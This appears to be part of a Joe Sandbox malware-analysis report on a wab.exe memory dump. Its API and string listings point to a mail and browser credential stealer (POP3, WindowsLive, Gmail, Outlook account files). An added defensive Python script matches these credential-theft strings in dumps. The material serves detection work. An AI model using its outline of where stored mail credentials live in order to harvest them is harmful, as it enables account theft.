                                                                                              • API ID: memcpy
                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                              • API String ID: 3510742995-3273207271
                                                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                              • memset.MSVCRT ref: 0040FA1E
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                                                              • API String ID: 945165440-3589380929
                                                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                                                              • strchr.MSVCRT ref: 0040371F
                                                                                              • _mbscpy.MSVCRT ref: 00403748
                                                                                              • _mbscpy.MSVCRT ref: 00403758
                                                                                              • strlen.MSVCRT ref: 00403778
                                                                                              • sprintf.MSVCRT ref: 0040379C
                                                                                              • _mbscpy.MSVCRT ref: 004037B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                              • String ID: %s@gmail.com
                                                                                              • API String ID: 500647785-4097000612
                                                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
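The string clusters listed in the blocks above (the Eudora-style INI keys read through GetPrivateProfileStringA, the WindowsLive:name= credential-manager target, the %s@gmail.com format string, the SQLite ATTACH error messages and the TranslatorName/TranslatorURL language-file keys) are the residue of an embedded NirSoft-style password-recovery module, which is consistent with the report's WebBrowserPassView and mail-credential signatures. The script below is an added example, not part of the Joe Sandbox report or of the sample: it turns those String IDs into an offline triage check over a raw memory dump such as the .sdmp referenced in these blocks. The bytes it scans are constructed inline so it runs without the real dump; the cluster names, the per-cluster threshold and the verdict rule are choices made for this example, not anything the report defines.

```python
"""Offline triage: look for the credential-harvesting string clusters that the
report's function analysis attributes to the wab.exe memory dump.

Added example, not part of the sandbox report or the sample. The strings are
copied from the report's "String ID" fields; the cluster names, the per-cluster
threshold and the verdict rule are assumptions made here for illustration.
"""
from typing import Dict, List

# Strings copied from the report's "String ID" fields (Joe Sandbox joins the
# strings of one function with '$'). Cluster names are this example's own.
CLUSTERS: Dict[str, List[bytes]] = {
    "eudora_ini_keys": [
        b"LoginName", b"PopAccount", b"PopServer", b"RealName",
        b"ReturnAddress", b"SavePasswordText", b"UsesIMAP",
    ],
    "windowslive_credman": [b"WindowsLive:name=*", b"windowslive:name="],
    "gmail_format": [b"%s@gmail.com"],
    "sqlite_attach_errors": [
        b"unable to open database: %s",
        b"database is already attached",
        b"cannot ATTACH database within transaction",
        b"too many attached databases - max %d",
    ],
    # Short generic words: never judge on a single hit, only on the cluster.
    "nirsoft_lang_ini": [b"TranslatorName", b"TranslatorURL", b"charset", b"general", b"rtl"],
}


def find_any_encoding(data: bytes, s: bytes) -> int:
    """Offset of s in data as ASCII or as UTF-16LE (the WideCharToMultiByte
    calls in the WindowsLive function make the wide form plausible), or -1."""
    for needle in (s, s.decode("ascii").encode("utf-16-le")):
        off = data.find(needle)
        if off != -1:
            return off
    return -1


def scan_dump(data: bytes, min_fraction: float = 0.6) -> Dict[str, dict]:
    """Per cluster: which strings were found, at what offset, and whether enough
    of the cluster is present (threshold chosen for this example) to count."""
    results = {}
    for name, strings in CLUSTERS.items():
        hits = {}
        for s in strings:
            off = find_any_encoding(data, s)
            if off != -1:
                hits[s.decode("ascii")] = off
        fraction = len(hits) / len(strings)
        results[name] = {"hits": hits, "fraction": fraction,
                         "matched": fraction >= min_fraction}
    return results


def assess(data: bytes) -> dict:
    """Verdict rule (an assumption of this example): two or more matched
    clusters means an embedded credential-recovery module is likely present."""
    clusters = scan_dump(data)
    matched = sorted(n for n, r in clusters.items() if r["matched"])
    return {"clusters": clusters, "matched": matched,
            "likely_credential_harvester": len(matched) >= 2}


def build_sample_dump() -> bytes:
    """Constructed stand-in for the .sdmp: a fake PE-like prefix, a subset of
    the strings (one in UTF-16LE) and NOP filler. Not data from the real sample."""
    parts = [
        b"MZ" + b"\x00" * 62,
        b"unable to open database: %s\x00",
        b"database is already attached\x00",
        b"LoginName\x00PopAccount\x00PopServer\x00RealName\x00",
        b"ReturnAddress\x00SavePasswordText\x00UsesIMAP\x00",
        "WindowsLive:name=*".encode("utf-16-le") + b"\x00\x00",
        b"windowslive:name=\x00",
        b"%s@gmail.com\x00",
        b"\x90" * 256,
    ]
    return b"".join(parts)


def scan_file(path: str) -> dict:
    """Run the same check over a real dump file."""
    with open(path, "rb") as fh:
        return assess(fh.read())


if __name__ == "__main__":
    report = assess(build_sample_dump())
    for name, r in report["clusters"].items():
        print(f"{name:22s} {r['fraction']:.2f} {'MATCH' if r['matched'] else '-'}")
    print("likely credential harvester:", report["likely_credential_harvester"])
```

On the constructed dump the Eudora, WindowsLive and gmail clusters match while the SQLite cluster (two of four strings) and the language-file cluster do not, so the verdict is positive on mail-credential evidence alone. Scoring per cluster rather than per string is deliberate: words such as "general", "charset" and "rtl" appear in plenty of benign binaries, so a single hit must never drive the verdict.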

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004094C8
                                                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                              • memset.MSVCRT ref: 0040950C
                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                              • String ID: sysdatetimepick32
                                                                                              • API String ID: 3411445237-4169760276
                                                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                              • String ID:
                                                                                              • API String ID: 3642520215-0
                                                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1999381814-0
                                                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                              • API String ID: 1297977491-3883738016
                                                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                                                              • memcpy.MSVCRT ref: 0044972E
                                                                                              • memcpy.MSVCRT ref: 0044977B
                                                                                              • memcpy.MSVCRT ref: 004497F6
                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                                                              • memcpy.MSVCRT ref: 00449846
                                                                                              • memcpy.MSVCRT ref: 00449887
                                                                                              • memcpy.MSVCRT ref: 004498B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: gj
                                                                                              • API String ID: 438689982-4203073231
                                                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm$__aullrem
                                                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                              • API String ID: 643879872-978417875
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405827
• SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
• SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
• SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
• memset.MSVCRT ref: 004058C3
• SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
• SetFocus.USER32(?), ref: 00405976
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
• _mbscat.MSVCRT ref: 0040A8FF
• sprintf.MSVCRT ref: 0040A921
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: FileWrite_mbscatsprintfstrlen
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 1631269929-4153097237
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040810E
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
• LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 524865279-2190619648
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpystrlen$memsetsprintf
• String ID: %s (%s)
• API String ID: 3756086014-1363028141
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
• ??2@YAPAXI@Z.MSVCRT ref: 004441C2
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
  • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
• ??3@YAXPAX@Z.MSVCRT ref: 004441FC
• CloseHandle.KERNEL32(?), ref: 00444206
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID: ACD
• API String ID: 1886237854-620537770
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004091EC
• sprintf.MSVCRT ref: 00409201
  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
  • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
• SetWindowTextA.USER32(?,?), ref: 00409228
• EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• cannot release savepoint - SQL statements in progress, xrefs: 00426A20
• unknown error, xrefs: 004277B2
• abort due to ROLLBACK, xrefs: 00428781
• cannot open savepoint - SQL statements in progress, xrefs: 00426934
• no such savepoint: %s, xrefs: 00426A02
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
• API String ID: 3510742995-3035234601
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-3608744896
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
• memset.MSVCRT ref: 00410246
• memset.MSVCRT ref: 00410258
  • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
• memset.MSVCRT ref: 0041033F
• _mbscpy.MSVCRT ref: 00410364
• CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
                                                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 0044406C
• ??2@YAPAXI@Z.MSVCRT ref: 00444075
• WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
• strlen.MSVCRT ref: 004440D1
  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
• memcpy.MSVCRT ref: 004440EB
• ??3@YAXPAX@Z.MSVCRT ref: 0044417E
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
• String ID:
• API String ID: 577244452-0
• Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
• Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
• Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
• Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
• _strcmpi.MSVCRT ref: 00404518
• _strcmpi.MSVCRT ref: 00404536
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi$memcpystrlen
• String ID: imap$pop3$smtp
• API String ID: 2025310588-821077329
• Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
• Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
• Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
• Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040C02D
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
  • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2726666094-3614832568
